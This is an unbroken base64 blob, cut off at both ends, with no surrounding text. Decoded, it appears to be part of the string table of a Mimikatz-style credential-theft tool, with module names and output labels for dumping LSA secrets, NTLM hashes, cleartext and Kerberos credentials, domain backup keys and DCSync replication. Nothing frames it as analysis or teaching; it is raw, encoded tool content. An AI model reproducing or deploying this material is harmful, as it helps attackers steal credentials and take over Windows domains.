wBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAUwBhAG0AQwBvAG4AbgBlAGMAdAAgACUAMAA4AHgACgAAAFMAYQBtAFMAcwAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAGcAZQB0AEgAYQBuAGQAbABlACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAGcAZQB0AEgAYQBuAGQAbABlACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAGcAZQB0AFUAbgBpAHEAdQBlAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAACgBSAEkARAAgACAAOgAgACUAMAA4AHgAIAAoACUAdQApAAoAVQBzAGUAcgAgADoAIAAlAHcAWgAKAAAATABNACAAIAAgADoAIAAAAAoATgBUAEwATQAgADoAIAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAXwB1AHMAZQByACAAOwAgAFMAYQBtAFEAdQBlAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AVQBzAGUAcgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBVAHMAZQByACAAJQAwADgAeAAKAAAAUAByAGkAbQBhAHIAeQAAAEMATABFAEEAUgBUAEUAWABUAAAAVwBEAGkAZwBlAHMAdAAAAEsAZQByAGIAZQByAG8AcwAAAAAASwBlAHIAYgBlAHIAbwBzAC0ATgBlAHcAZQByAC0ASwBlAHkAcwAAAE4AVABMAE0ALQBTAHQAcgBvAG4AZwAtAE4AVABPAFcARgAAAAoAIAAqACAAJQBzAAoAAAAgACAAIAAgAEwATQAgACAAIAA6ACAAAAAKACAAIAAgACAATgBUAEwATQAgADoAIAAAAAAAIAAgACAAIAAlAC4AKgBzAAoAAAAgACAAIAAgACUAMAAyAHUAIAAgAAAAAAAgACAAIAAgAEQAZQBmAGEAdQBsAHQAIABTAGEAbAB0ACAAOgAgACUALgAqAHMACgAAAAAAQwByAGUAZABlAG4AdABpAGEAbABzAAAATwBsAGQAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAAAAAAIAAgACAAIABEAGUAZgBhAHUAbAB0ACAAUwBhAGwAdAAgADoAIAAlAC4AKgBzAAoAIAAgACAAIABEAGUAZgBhAHUAbAB0ACAASQB0AGUAcgBhAHQAaQBvAG4AcwAgADoAIAAlAHUACgAAAAAAUwBlAHIAdgBpAGMAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAE8AbABkAGUAcgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAACAAIAAgACAAUgBhAG4AZABvAG0AIABWAGEAbAB1AGUAIAA6ACAAAAAgACAAIAAgACAAIAAlAHMAIAA6ACAAAAAgACAAIAAgACAAIAAlAHMAIAAoACUAdQApACAAOgAgAAAAAABOAE8ATgBFACAAIAAgAAAATgBUADQATwBXAEYAIAAAAEMATABFAEEAUgAgACAAAABWAEUAUgBTAEkATwBOAAAAIABbACUAcwBdACAAJQB3AFoAIAAtAD4AIAAlAHcAWgAKAAAAIAAgACAAIAAqACAAAAAAAHUAbgBrAG4AbwB3AG4APwAAAAAAIAAtACAAJQBzACAALQAgAAAAAAAtACAAJQB1ACAALQAgAAAAbABzAGEAZABiAC4AZABsAGwAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AdAByAHUAcwB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwB0AHIAdQBzAHQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgBDAHUAcgByAGUAbgB0ACAAZABvAG0AYQBpAG4AOgAgACUAdwBaACAAKAAlAHcAWgAAAAoARABvAG0AYQBpAG4AOgAgACUAdwBaACAAKAAlAHcAWgAAACAAIABJAG4AIAAAACAATwB1AHQAIAAAACAASQBuAC0AMQAAAE8AdQB0AC0AMQAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHQAcgB1AHMAdAAgADsAIABMAHMAYQBRAHUAZQByAHkAVAByAHUAcwB0AGUAZABEAG8AbQBhAGkAbgBJAG4AZgBvAEIAeQBOAGEAbQBlACAAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwB0AHIAdQBzAHQAIAA7ACAATABzAGEARQBuAHUAbQBlAHIAYQB0AGUAVAByAHUAcwB0AGUAZABEAG8AbQBhAGkAbgBzAEUAeAAgACUAMAA4AHgACgAAACAAIAAqACAAUgBTAEEAIABrAGUAeQAKAAAAAABuAHQAZABzAAAAAAAJAFAARgBYACAAYwBvAG4AdABhAGkAbgBlAHIAIAAgADoAIAAlAHMAIAAtACAAJwAlAHMAJwAKAAAAAAAgACAAKgAgAEwAZQBnAGEAYwB5ACAAawBlAHkACgAAAGsAZQB5AAAAbABlAGcAYQBjAHkAAAAAAAAAAAAgACAAKgAgAFUAbgBrAG4AbwB3AG4AIABrAGUAeQAgACgAcwBlAGUAbgAgAGEAcwAgACUAMAA4AHgAKQAKAAAACQBFAHgAcABvAHIAdAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAALQAgACcAJQBzACcACgAAAAAARwAkAEIAQwBLAFUAUABLAEUAWQBfAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEsAZQB5AEYAcgBvAG0ARwBVAEkARAAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBMAHMAYQBSAGUAdAByAGkAZQB2AGUAUAByAGkAdgBhAHQAZQBEAGEAdABhADoAIAAwAHgAJQAwADgAeAAKAAAAAAAgAHMAZQBlAG0AcwAgAHQAbwAgAGIAZQAgAGEAIAB2AGEAbABpAGQAIABHAFUASQBEAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBiAGsAZQB5ACAAOwAgAEkAbgB2AGEAbABpAGQAZQAgAEcAVQBJAEQAIAAoADAAeAAlADAAOAB4ACkAIAA7ACAAJQBzAAoAAAAAAAoAQwB1AHIAcgBlAG4AdAAgAHAAcgBlAGYAZQByAGUAZAAgAGsAZQB5ADoAIAAgACAAIAAgACAAIAAAAEcAJABCAEMASwBVAFAASwBFAFkAXwBQAFIARQBGAEUAUgBSAEUARAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGIAawBlAHkAIAA7ACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8ATABzAGEAUgBlAHQAcgBpAGUAdgBlAFAAcgBpAHYAYQB0AGUARABhAHQAYQA6ACAAMAB4ACUAMAA4AHgACgAAAAAACgBDAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5ACAAcAByAGUAZgBlAHIAZQBkACAAawBlAHkAOgAgAAAARwAkAEIAQwBLAFUAUABLAEUAWQBfAFAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHIAcABkAGEAdABhACAAOwAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAEwAcwBhAFIAZQB0AHIAaQBlAHYAZQBQAHIAaQB2AGEAdABlAEQAYQB0AGEAOgAgADAAeAAlADAAOAB4AAoAAAAAAFsARABDAF0AIAAnACUAcwAnACAAdwBpAGwAbAAgAGIAZQAgAHQAaABlACAAZABvAG0AYQBpAG4ACgAAAGQAYwAAAAAAawBkAGMAAABbAEQAQwBdACAAJwAlAHMAJwAgAHcAaQBsAGwAIABiAGUAIAB0AGgAZQAgAEQAQwAgAHMAZQByAHYAZQByAAoACgAAAFsARABDAF0AIABPAGIAagBlAGMAdAAgAHcAaQB0AGgAIABHAFUASQBEACAAJwAlAHMAJwAKAAoAAAAAAFsARABDAF0AIAAnACUAcwAnACAAdwBpAGwAbAAgAGIAZQAgAHQAaABlACAAdQBzAGUAcgAgAGEAYwBjAG8AdQBuAHQACgAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAARABSAFMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMALAAgAGkAbgB2AGEAbABpAGQAIABkAHcATwB1AHQAVgBlAHIAcwBpAG8AbgAgAGEAbgBkAC8AbwByACAAYwBOAHUAbQBPAGIAagBlAGMAdABzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBkAGMAcwB5AG4AYwAgADsAIABHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBkAGMAcwB5AG4AYwAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBkAGMAcwB5AG4AYwAgADsAIABNAGkAcwBzAGkAbgBnACAAdQBzAGUAcgAgAG8AcgAgAGcAdQBpAGQAIABhAHIAZwB1AG0AZQBuAHQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGQAYwBzAHkAbgBjACAAOwAgAEQAbwBtAGEAaQBuACAAQwBvAG4AdAByAG8AbABsAGUAcgAgAG4AbwB0ACAAcAByAGUAcwBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAARABvAG0AYQBpAG4AIABuAG8AdAAgAHAAcgBlAHMAZQBuAHQALAAgAG8AcgAgAGQAbwBlAHMAbgAnAHQAIABsAG8AbwBrACAAbABpAGsAZQAgAGEAIABGAFEARABOAAoAAAAAACUAcwAlAC4AKgBzACUAcwAAAAAAIAAgACAAIAAlAHMALQAlADIAdQA6ACAAAAAAACAAIABIAGEAcwBoACAAJQBzADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGQAYwBzAHkAbgBjAF8AZABlAGMAcgB5AHAAdAAgADsAIABSAHQAbABEAGUAYwByAHkAcAB0AEQARQBTADIAYgBsAG8AYwBrAHMAMQBEAFcATwBSAEQAAAAAAE8AYgBqAGUAYwB0ACAAUgBEAE4AIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAFMAQwBSAEkAUABUAAAAAABBAEMAQwBPAFUATgBUAEQASQBTAEEAQgBMAEUAAAAAADAAeAA0ACAAPwAAAEgATwBNAEUARABJAFIAXwBSAEUAUQBVAEkAUgBFAEQAAAAAAEwATwBDAEsATwBVAFQAAABQAEEAUwBTAFcARABfAE4ATwBUAFIARQBRAEQAAAAAAFAAQQBTAFMAVwBEAF8AQwBBAE4AVABfAEMASABBAE4ARwBFAAAAAAAAAAAARQBOAEMAUgBZAFAAVABFAEQAXwBUAEUAWABUAF8AUABBAFMAUwBXAE8AUgBEAF8AQQBMAEwATwBXAEUARAAAAFQARQBNAFAAXwBEAFUAUABMAEkAQwBBAFQARQBfAEEAQwBDAE8AVQBOAFQAAAAAAE4ATwBSAE0AQQBMAF8AQQBDAEMATwBVAE4AVAAAAAAAMAB4ADQAMAAwACAAPwAAAEkATgBUAEUAUgBEAE8ATQBBAEkATgBfAFQAUgBVAFMAVABfAEEAQwBDAE8AVQBOAFQAAABXAE8AUgBLAFMAVABBAFQASQBPAE4AXwBUAFIAVQBTAFQAXwBBAEMAQwBPAFUATgBUAAAAUwBFAFIAVgBFAFIAXwBUAFIAVQBTAFQAXwBBAEMAQwBPAFUATgBUAAAAAAAwAHgANAAwADAAMAAgAD8AAAAAADAAeAA4ADAAMAAwACAAPwAAAAAARABPAE4AVABfAEUAWABQAEkAUgBFAF8AUABBAFMAUwBXAEQAAAAAAE0ATgBTAF8ATABPAEcATwBOAF8AQQBDAEMATwBVAE4AVAAAAFMATQBBAFIAVABDAEEAUgBEAF8AUgBFAFEAVQBJAFIARQBEAAAAAABUAFIAVQBTAFQARQBEAF8ARgBPAFIAXwBEAEUATABFAEcAQQBUAEkATwBOAAAAAABOAE8AVABfAEQARQBMAEUARwBBAFQARQBEAAAAVQBTAEUAXwBEAEUAUwBfAEsARQBZAF8ATwBOAEwAWQAAAAAARABPAE4AVABfAFIARQBRAFUASQBSAEUAXwBQAFIARQBBAFUAVABIAAAAAABQAEEAUwBTAFcATwBSAEQAXwBFAFgAUABJAFIARQBEAAAAAABUAFIAVQBTAFQARQBEAF8AVABPAF8AQQBVAFQASABFAE4AVABJAEMAQQBUAEUAXwBGAE8AUgBfAEQARQBMAEUARwBBAFQASQBPAE4AAAAAAE4ATwBfAEEAVQBUAEgAXwBEAEEAVABBAF8AUgBFAFEAVQBJAFIARQBEAAAAUABBAFIAVABJAEEATABfAFMARQBDAFIARQBUAFMAXwBBAEMAQwBPAFUATgBUAAAAVQBTAEUAXwBBAEUAUwBfAEsARQBZAFMAAAAAADAAeAAxADAAMAAwADAAMAAwADAAIAA/AAAAAAAwAHgAMgAwADAAMAAwADAAMAAwACAAPwAAAAAAMAB4ADQAMAAwADAAMAAwADAAMAAgAD8AAAAAADAAeAA4ADAAMAAwADAAMAAwADAAIAA/AAAAAABEAE8ATQBBAEkATgBfAE8AQgBKAEUAQwBUAAAARwBSAE8AVQBQAF8ATwBCAEoARQBDAFQAAAAAAE4ATwBOAF8AUwBFAEMAVQBSAEkAVABZAF8ARwBSAE8AVQBQAF8ATwBCAEoARQBDAFQAAABBAEwASQBBAFMAXwBPAEIASgBFAEMAVAAAAAAATgBPAE4AXwBTAEUAQwBVAFIASQBUAFkAXwBBAEwASQBBAFMAXwBPAEIASgBFAEMAVAAAAFUAUwBFAFIAXwBPAEIASgBFAEMAVAAAAE0AQQBDAEgASQBOAEUAXwBBAEMAQwBPAFUATgBUAAAAVABSAFUAUwBUAF8AQQBDAEMATwBVAE4AVAAAAEEAUABQAF8AQgBBAFMASQBDAF8ARwBSAE8AVQBQAAAAQQBQAFAAXwBRAFUARQBSAFkAXwBHAFIATwBVAFAAAAAqACoAIABTAEEATQAgAEEAQwBDAE8AVQBOAFQAIAAqACoACgAKAAAAUwBBAE0AIABVAHMAZQByAG4AYQBtAGUAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAVQBzAGUAcgAgAFAAcgBpAG4AYwBpAHAAYQBsACAATgBhAG0AZQAgACAAOgAgAAAAQQBjAGMAbwB1AG4AdAAgAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAoACAAJQBzACAAKQAKAAAAVQBzAGUAcgAgAEEAYwBjAG8AdQBuAHQAIABDAG8AbgB0AHIAbwBsACAAOgAgACUAMAA4AHgAIAAoACAAAAAAAEEAYwBjAG8AdQBuAHQAIABlAHgAcABpAHIAYQB0AGkAbwBuACAAIAAgADoAIAAAAFAAYQBzAHMAdwBvAHIAZAAgAGwAYQBzAHQAIABjAGgAYQBuAGcAZQAgADoAIAAAAE8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5ACAASQBEACAAIAAgADoAIAAAAE8AYgBqAGUAYwB0ACAAUgBlAGwAYQB0AGkAdgBlACAASQBEACAAIAAgADoAIAAlAHUACgAAAAAACgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOgAKAAAAAABuAHQAbABtAAAAAABsAG0AIAAgAAAAAAAKAFMAdQBwAHAAbABlAG0AZQBuAHQAYQBsACAAQwByAGUAZABlAG4AdABpAGEAbABzADoACgAAACoAIAAlAHcAWgAgACoACgAAAAAAJTAyeAAAAAAgACAAIAAgAFUAbgBrAG4AbwB3AG4AIABkAGEAdABhACAAOgAgAAAAAAAAACoAKgAgAFQAUgBVAFMAVABFAEQAIABEAE8ATQBBAEkATgAgAC0AIABBAG4AdABpAHMAbwBjAGkAYQBsACAAKgAqAAoACgAAAFAAYQByAHQAbgBlAHIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAAAAYwBtAGQAAABDAG8AbQBtAGEAbgBkACAAUAByAG8AbQBwAHQAIAAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAEMATQBEACkAAAAAAHIAZQBnAGUAZABpAHQAAAAAAAAAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIAAgACAAIAAgACAAIAAgACAAKAB3AGkAdABoAG8AdQB0ACAARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACkAAAAAAHQAYQBzAGsAbQBnAHIAAABUAGEAcwBrACAATQBhAG4AYQBnAGUAcgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQ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AZQByACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIABCAHUAaQBsAHQAaQBuACAAKAA/ACkAIAAlADAAOAB4AAoAAAAKAEQAbwBtAGEAaQBuACAAbgBhAG0AZQAgADoAIAAlAHcAWgAAAAAACgBEAG8AbQBhAGkAbgAgAFMASQBEACAAIAA6ACAAAAAKACAAJQAtADUAdQAgACUAdwBaAAAAAAAKACAAfAAgACUALQA1AHUAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABJAGQAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEcAZQB0AEcAcgBvAHUAcABzAEYAbwByAFUAcwBlAHIAIAAlADAAOAB4AAAAAAAKACAAfABgACUALQA1AHUAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEcAZQB0AEEAbABpAGEAcwBNAGUAbQBiAGUAcgBzAGgAaQBwACAAJQAwADgAeAAAAAAACgAgAHwAtAAlAC0ANQB1ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0AUgBpAGQAVABvAFMAaQBkACAAJQAwADgAeAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4AVQBzAGUAcgAgACUAMAA4AHgAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBVAHMAZQByAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBEAG8AbQBhAGkAbgBzAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEMAbwBuAG4AZQBjAHQAIAAlADAAOAB4AAoAAAAAAGQAZQBiAHUAZwAAAEEAcwBrACAAZABlAGIAdQBnACAAcAByAGkAdgBpAGwAZQBnAGUAAABkAHIAaQB2AGUAcgAAAAAAQQBzAGsAIABsAG8AYQBkACAAZAByAGkAdgBlAHIAIABwAHIAaQB2AGkAbABlAGcAZQAAAHMAZQBjAHUAcgBpAHQAeQAAAAAAQQBzAGsAIABzAGUAYwB1AHIAaQB0AHkAIABwAHIAaQB2AGkAbABlAGcAZQAAAAAAdABjAGIAAABBAHMAawAgAHQAYwBiACAAcAByAGkAdgBpAGwAZQBnAGUAAABiAGEAYwBrAHUAcAAAAAAAQQBzAGsAIABiAGEAYwBrAHUAcAAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAAAByAGUAcwB0AG8AcgBlAAAAQQBzAGsAIAByAGUAcwB0AG8AcgBlACAAcAByAGkAdgBpAGwAZQBnAGUAAABzAHkAcwBlAG4AdgAAAAAAAAAAAEEAcwBrACAAcwB5AHMAdABlAG0AIABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIABwAHIAaQB2AGkAbABlAGcAZQAAAAAAQQBzAGsAIABhACAAcAByAGkAdgBpAGwAZQBnAGUAIABiAHkAIABpAHQAcwAgAGkAZAAAAEEAcwBrACAAYQAgAHAAcgBpAHYAaQBsAGUAZwBlACAAYgB5ACAAaQB0AHMAIABuAGEAbQBlAAAAcAByAGkAdgBpAGwAZQBnAGUAAABQAHIAaQB2AGkAbABlAGcAZQAgAG0AbwBkAHUAbABlAAAAAABQAHIAaQB2AGkAbABlAGcAZQAgACcAJQB1ACcAIABPAEsACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAHMAaQBtAHAAbABlACAAOwAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACAAKAAlAHUAKQAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBpAHYAaQBsAGUAZwBlAF8AaQBkACAAOwAgAE0AaQBzAHMAaQBuAGcAIAAnAGkAZAAnAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAG4AYQBtAGUAIAA7ACAATABVAEkARAAgAGgAaQBnAGgAIABwAGEAcgB0ACAAaQBzACAAJQB1AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBpAHYAaQBsAGUAZwBlAF8AbgBhAG0AZQAgADsAIABMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAGkAdgBpAGwAZQBnAGUAXwBuAGEAbQBlACAAOwAgAE0AaQBzAHMAaQBuAGcAIAAnAG4AYQBtAGUAJwAKAAAAZQB4AHAAbwByAHQAcwAAAEwAaQBzAHQAIABlAHgAcABvAHIAdABzAAAAAABpAG0AcABvAHIAdABzAAAATABpAHMAdAAgAGkAbQBwAG8AcgB0AHMAAAAAAHMAdABhAHIAdAAAAFMAdABhAHIAdAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcwB0AG8AcAAAAAAAVABlAHIAbQBpAG4AYQB0AGUAIABhACAAcAByAG8AYwBlAHMAcwAAAHMAdQBzAHAAZQBuAGQAAABTAHUAcwBwAGUAbgBkACAAYQAgAHAAcgBvAGMAZQBzAHMAAAByAGUAcwB1AG0AZQAAAAAAUgBlAHMAdQBtAGUAIABhACAAcAByAG8AYwBlAHMAcwAAAAAAUAByAG8AYwBlAHMAcwAgAG0AbwBkAHUAbABlAAAAAABUAHIAeQBpAG4AZwAgAHQAbwAgAHMAdABhAHIAdAAgACIAJQBzACIAIAA6ACAAAABPAEsAIAAhACAAKABQAEkARAAgACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBzAHQAYQByAHQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AYwByAGUAYQB0AGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgB0AFQAZQByAG0AaQBuAGEAdABlAFAAcgBvAGMAZQBzAHMAAAAAAE4AdABTAHUAcwBwAGUAbgBkAFAAcgBvAGMAZQBzAHMAAAAAAE4AdABSAGUAcwB1AG0AZQBQAHIAbwBjAGUAcwBzAAAAJQBzACAAbwBmACAAJQB1ACAAUABJAEQAIAA6ACAATwBLACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAG4AZQByAGkAYwBPAHAAZQByAGEAdABpAG8AbgAgADsAIAAlAHMAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAbgBlAHIAaQBjAE8AcABlAHIAYQB0AGkAbwBuACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAAcABpAGQAIAAoAC8AcABpAGQAOgAxADIAMwApACAAaQBzACAAbQBpAHMAcwBpAG4AZwAAACUAdQAJACUAdwBaAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AYwBhAGwAbABiAGEAYwBrAFAAcgBvAGMAZQBzAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAGEAbABsAGIAYQBjAGsAUAByAG8AYwBlAHMAcwAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AbwBwAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAlAHcAWgAAAAAACgAJACUAcAAgAC0APgAgACUAdQAAAAAACQAlAHUAAAAJACAAAAAAAAkAJQBwAAAACQAlAFMAAAAJAC0APgAgACUAUwAAAAAACgAJACUAcAAgAC0APgAgACUAcAAJACUAUwAgACEAIAAAAAAAJQBTAAAAAAAjACUAdQAAAFMAdABhAHIAdAAgAHMAZQByAHYAaQBjAGUAAABSAGUAbQBvAHYAZQAgAHMAZQByAHYAaQBjAGUAAAAAAFMAdABvAHAAIABzAGUAcgB2AGkAYwBlAAAAAABTAHUAcwBwAGUAbgBkACAAcwBlAHIAdgBpAGMAZQAAAFIAZQBzAHUAbQBlACAAcwBlAHIAdgBpAGMAZQAAAAAAcAByAGUAcwBoAHUAdABkAG8AdwBuAAAAUAByAGUAcwBoAHUAdABkAG8AdwBuACAAcwBlAHIAdgBpAGMAZQAAAHMAaAB1AHQAZABvAHcAbgAAAAAAUwBoAHUAdABkAG8AdwBuACAAcwBlAHIAdgBpAGMAZQAAAAAATABpAHMAdAAgAHMAZQByAHYAaQBjAGUAcwAAAFMAZQByAHYAaQBjAGUAIABtAG8AZAB1AGwAZQAAAAAAJQBzACAAJwAlAHMAJwAgAHMAZQByAHYAaQBjAGUAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABnAGUAbgBlAHIAaQBjAEYAdQBuAGMAdABpAG8AbgAgADsAIABTAGUAcgB2AGkAYwBlACAAbwBwAGUAcgBhAHQAaQBvAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAEkAbgBqAGUAYwB0ACAAbgBvAHQAIABhAHYAYQBpAG